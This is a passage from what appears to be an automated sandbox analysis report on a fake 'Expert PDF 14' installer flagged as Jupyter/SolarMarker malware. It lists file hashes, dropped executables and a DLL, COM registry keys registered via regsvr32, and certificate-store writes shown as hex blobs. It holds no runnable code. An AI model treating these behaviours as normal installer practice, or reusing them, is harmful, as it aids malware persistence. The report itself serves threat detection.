| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | acc795abc9374d0e5f0a3b9bba4d81b6 |
| SHA1 | 6752858c95e9aa95ba51d367eb098fd4caea3766 |
| SHA256 | 2a2106f5ec627952e4dafc37f1c6e0bbd1abeb6633d2aec13c48f92e2b4e7aac |
| SHA512 | e6ffb0f51858ba10d4dc5da6ad2b44015ed9deed7b3fdd9f0e4e2f40be7f5fe8805e80f0c1e2727a5a33d9298524321a330c95b3f8949d3790f86737bb9b0970 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-17 18:08
Reported
2023-03-17 18:35
Platform
win10v2004-20230220-en
Max time kernel
1218s
Max time network
1234s
Command Line
Signatures
Jupyter, SolarMarker
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| N/A | N/A | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A}\ = "IDownloadItemExternalApp" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\TypeLib\Version = "1.0" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version\ = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ = "IInstallItemExternalApp" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E39BBB2-F9C5-488C-AC6C-DAA3EFFA4CE1}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\LocalizedString = "@%programdata%\\Expert PDF 14\\Installation\\Statistics.dll,-127" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{883556F2-137D-42B1-A379-EF040DB83897}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\ = "Installer Class" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{88395ED4-CB15-449D-AA03-0286C132147C}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\ = "IGeoIPStruct" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{54D1BE8B-911E-4F28-BC0D-E7545D5FD83B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0C65FB04-3503-4B15-A148-8904F9450F50}\Version\ = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7EAF85B3-F511-4B8D-8731-95015ACED100}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ = "IStartItemModule" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E66B52BF-144D-4611-9366-62C9B3A3BD0B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA738FC0-B58C-4717-BF65-F2034D0ABC09}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF8D15E0-84AC-4108-A158-348EEBA6C2FC}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0BBD5633-4BE2-42D0-BB7E-A021DF1E1753}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F0943358-2D26-4A19-A9DF-C949F475DDE3} | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\ = "DownloadItemMonetization Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A299F69F-9A31-485B-9743-F015326A9B0D}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9d